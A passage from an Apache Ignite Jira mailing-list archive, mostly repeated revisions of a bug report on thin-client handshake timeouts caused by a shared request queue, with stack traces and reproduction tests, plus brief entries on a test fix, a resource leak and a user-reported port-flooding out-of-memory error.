cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows:
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 75 at the same time) thin clients loading data using putAlls 
in 5-record batches. A client connects, loads 3 batches and disconnects 
(Spark jobs, in fact). In other words, clients connect and disconnect constantly.
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem 
({*}ignitetest/tests/thin_client_concurrency{*}).

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 

[jira] [Created] (IGNITE-16845) RocksSnapshotManager#snapshotIterator() leaks ReadOptions

2022-04-13 Thread Roman Puchkovskiy (Jira)
Roman Puchkovskiy created IGNITE-16845:
--

 Summary: RocksSnapshotManager#snapshotIterator() leaks ReadOptions
 Key: IGNITE-16845
 URL: https://issues.apache.org/jira/browse/IGNITE-16845
 Project: Ignite
  Issue Type: Bug
  Components: persistence
Reporter: Roman Puchkovskiy
 Fix For: 3.0.0-alpha5






--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows:
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem 
({*}ignitetest/tests/thin_client_concurrency{*}).

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Commented] (IGNITE-16741) DoS attacks on ignite ports

2022-04-13 Thread Aleksandr Polovtcev (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16741?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521582#comment-17521582
 ] 

Aleksandr Polovtcev commented on IGNITE-16741:
--

[~bdq], thank you for reporting this issue. However, I was not able to 
reproduce this error with the aforementioned script. Can you please provide a 
little more information, like the full script code and your Ignite 
configuration? 

> DoS attacks on ignite ports
> ---
>
> Key: IGNITE-16741
> URL: https://issues.apache.org/jira/browse/IGNITE-16741
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.11.1
>Reporter: biandeqiang
>Assignee: Aleksandr Polovtcev
>Priority: Critical
>  Labels: ise
>
> DoS attacks on Ignite's TcpCommunicationSpi and TcpDiscoverySpi ports.
> The Ignite I use is embedded; Ignite uses two ports. When I was testing a DoS 
> attack on the ports, Ignite hit java.lang.OutOfMemoryError: Direct buffer 
> memory.
> TcpDiscoverySpi spi = new TcpDiscoverySpi();
> spi.setLocalPort(port); // port is an int
> TcpCommunicationSpi ipCom = new TcpCommunicationSpi();
> ipCom.setLocalPort(port);
>  
> {{[2021-12-01 14:12:59,056][WARN 
> ][0][0][grid-nio-worker-tcp-comm-4-#43%TcpCommunicationSpi%][ROOT][IgniteLoggerImp][88]
>  Caught unhandled exception in NIO worker thread (restart the node). 
> java.lang.OutOfMemoryError: Direct buffer memory
> at java.nio.Bits.reserveMemory(Bits.java:695)
> at java.nio.DirectByteBuffer.(DirectByteBuffer.java:123)
> at java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:311)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.register(GridNioServer.java:2672)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.bodyInternal(GridNioServer.java:2089)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.body(GridNioServer.java:1910)
> at org.apache.ignite.internal.util.worker.GridWorker.run(GridWorker.java:120)
> at java.lang.Thread.run(Thread.java:748)}}
>  
> I hope Ignite can also add a MaxConnect limit, as Tomcat does, and a counter: 
> if the counter exceeds the limit, wait several seconds before accepting new 
> connections.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows:
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration



Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).


!test_one_greedy_thin_client.png|thumbnail,width=200,height=150!

 



The following full stack trace is logged on the client side:

{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Commented] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16844?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521581#comment-17521581
 ] 

Nikolay Izhikov commented on IGNITE-16844:
--

https://ci2.ignite.apache.org/viewLog.html?buildId=6390267&tab=queuedBuildOverviewTab

> Fix IgniteOptimizationAggregationFuncSpec
> -
>
> Key: IGNITE-16844
> URL: https://issues.apache.org/jira/browse/IGNITE-16844
> Project: Ignite
>  Issue Type: Bug
>Reporter: Nikolay Izhikov
>Assignee: Nikolay Izhikov
>Priority: Minor
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> IgniteOptimizationAggregationFuncSpec fails after 
> https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows:
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration



Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).


!test_one_greedy_thin_client.png|thumbnail,width=200,height=200!

 



The following full stack trace is logged on the client side:

{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows:
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).


!test_one_greedy_thin_client.png!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Assigned] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16844?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nikolay Izhikov reassigned IGNITE-16844:


Assignee: Nikolay Izhikov

> Fix IgniteOptimizationAggregationFuncSpec
> -
>
> Key: IGNITE-16844
> URL: https://issues.apache.org/jira/browse/IGNITE-16844
> Project: Ignite
>  Issue Type: Bug
>Reporter: Nikolay Izhikov
>Assignee: Nikolay Izhikov
>Priority: Minor
>
> IgniteOptimizationAggregationFuncSpec fails after 
> https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)
Nikolay Izhikov created IGNITE-16844:


 Summary: Fix IgniteOptimizationAggregationFuncSpec
 Key: IGNITE-16844
 URL: https://issues.apache.org/jira/browse/IGNITE-16844
 Project: Ignite
  Issue Type: Bug
Reporter: Nikolay Izhikov


IgniteOptimizationAggregationFuncSpec fails after 
https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e





--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side, the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from one or several thin clients, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for 
ATOMIC caches a higher parallelism factor and larger putAll batches are needed.

The root cause is that a single queue in the Ignite node is used to serve all 
thin-client-related requests (the queue in the {_}GridThinClientExecutor{_}): 
both working requests like _putAll_ and control ones like _handshake_, which 
are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a 
timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By 
default, a 10-second timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows.
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 seconds) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means that the problem IS reproduced.{color}* The tests check that at 
least one thin client fails with the "Channel is closed" error and that the 
server node log contains a warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce enough load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ was not increased).

!test_one_greedy_thin_client.png|thumbnail!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.<init>(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
 ~[classes/:?]
